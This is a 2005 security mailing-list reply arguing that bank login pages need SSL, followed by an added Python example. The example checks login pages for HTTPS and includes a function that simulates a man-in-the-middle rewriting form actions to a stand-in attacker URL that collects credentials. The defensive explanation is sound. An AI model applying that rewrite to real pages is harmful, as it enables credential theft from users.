WebApp Sec
mailing list archives
Re: Should login pages be protected by SSL?
From: Amir Herzberg <herzbea () macs biu ac il>
Date: Tue, 21 Jun 2005 12:07:34 +0200
Andrew van der Stock wrote:
> Depends on the value of the system in use.
> ...
> OTOH, where the login leads to private data, such as your name and
> address, I feel that corporations have a duty of care to protect your
> data under the various privacy acts around the world. The cost of a
> certificate is much less than potential litigation, or more to the
> point, reputation loss if someone discovers a way around it.
I agree, and indeed, my focus is on really sensitive sites, esp. banks.
So it seems we are in agreement. I think most (or all??) security
experts really agree here, but since some of the companies object, I am
interested to see if there are some serious defenses of the unprotected
login practice.
> However, if it's a shopping cart type of thing, like Amazon, the thing
> that should be SSL is not the browsing of goods, but the transactions,
> particularly the credit card and address details.
Agreed...
> The Visa/MC PCI
> guidelines are quite stringent on applying reasonable controls to this
> data.
Well, actually, I've worked with the card people a lot but am not aware
of a specific requirement to use SSL to protect the form sent to the
consumer and not just to protect the CC# in transit. Do you know? If you
can give me some reference, I'd appreciate it. I can also ask my
contacts. I am very interested, as one of the companies which uses
unprotected login is Amex, and in fact we had a long argument with them
on these questions...
> In the case of Amazon 1-click, then effectively the 1-click is
> the thing requiring protection, so some form of control around that is
> also required.
Well, it is unfortunate that the 1-click login in Amazon is unprotected,
see http://AmirHerzberg.com/shame.html...
<skip>
--
Best regards,
Amir Herzberg
Associate Professor
Department of Computer Science
Bar Ilan University
http://AmirHerzberg.com
New: see my Hall Of Shame of Unprotected Login pages:
http://AmirHerzberg.com/shame.html
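The failure mode the thread argues about (a login form delivered over plain HTTP whose POST target is https://) can be shown in a few lines. What follows is an added example, not code from this thread, from Amazon or from Amex, and the URLs `bank.example` and `attacker.example` and the HTML are constructed for it. The checker flags a page that reached the browser unprotected even when its form action is https://, and the `mitm_rewrite` function shows why that matters: an on-path attacker who can edit the unprotected page can point the form at their own TLS server, and the user is given nothing to notice.

```python
"""Added example, not part of the original thread or of any vendor's code.

Models the threat discussed above: a login form served over plain HTTP whose
POST target is an https:// URL. The credentials are encrypted in transit, yet
an on-path attacker who can edit the unprotected page can rewrite the form so
the browser posts them elsewhere. All URLs and HTML below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormExtractor(HTMLParser):
    """Collect the action attribute of every <form> that holds a password input."""

    def __init__(self):
        super().__init__()
        self._form = None
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            if self._form["password"]:
                self.actions.append(self._form["action"])
            self._form = None


def login_form_targets(page_url, html):
    """Resolve each login form's action (possibly relative) against the page URL."""
    parser = LoginFormExtractor()
    parser.feed(html)
    return [urljoin(page_url, action) for action in parser.actions]


def assess_login_page(page_url, html):
    """Return the findings for a login page fetched from page_url.

    'page-not-https'       : the form itself reached the browser unprotected
    'form-posts-over-http' : credentials would leave the browser in the clear
    'no-login-form'        : nothing with a password field was found
    """
    findings = []
    if urlsplit(page_url).scheme != "https":
        findings.append("page-not-https")
    targets = login_form_targets(page_url, html)
    if not targets:
        findings.append("no-login-form")
    for target in targets:
        if urlsplit(target).scheme != "https":
            findings.append("form-posts-over-http")
    return findings


def mitm_rewrite(html, attacker_url):
    """What an on-path attacker can do to a page that arrived over HTTP:
    point every form at a server they control and leave the rest untouched."""
    return re.sub(r'action="[^"]*"', lambda m: 'action="%s"' % attacker_url, html)


# Constructed sample of the pattern the thread criticises: the page is plain
# HTTP while the submission target is HTTPS.
LOGIN_PAGE_URL = "http://bank.example/login"
LOGIN_PAGE_HTML = """<html><body>
<form method="post" action="https://bank.example/do_login">
  <input name="user"><input type="password" name="pass">
  <input type="submit" value="Log in">
</form></body></html>"""


if __name__ == "__main__":
    print(assess_login_page(LOGIN_PAGE_URL, LOGIN_PAGE_HTML))
    # -> ['page-not-https']  (the POST target itself is fine)
    tampered = mitm_rewrite(LOGIN_PAGE_HTML, "https://attacker.example/collect")
    print(login_form_targets(LOGIN_PAGE_URL, tampered))
    # -> ['https://attacker.example/collect']  (still https, so no browser warning)
    print(assess_login_page("https://bank.example/login", LOGIN_PAGE_HTML))
    # -> []  serving the page itself over TLS is what closes the hole
```

Note that checking the form action is not enough: after the rewrite the action is still an https:// URL, just not the bank's, so the only finding that survives is that the page itself was not served over TLS. That is the whole argument for protecting the login page and not only the POST.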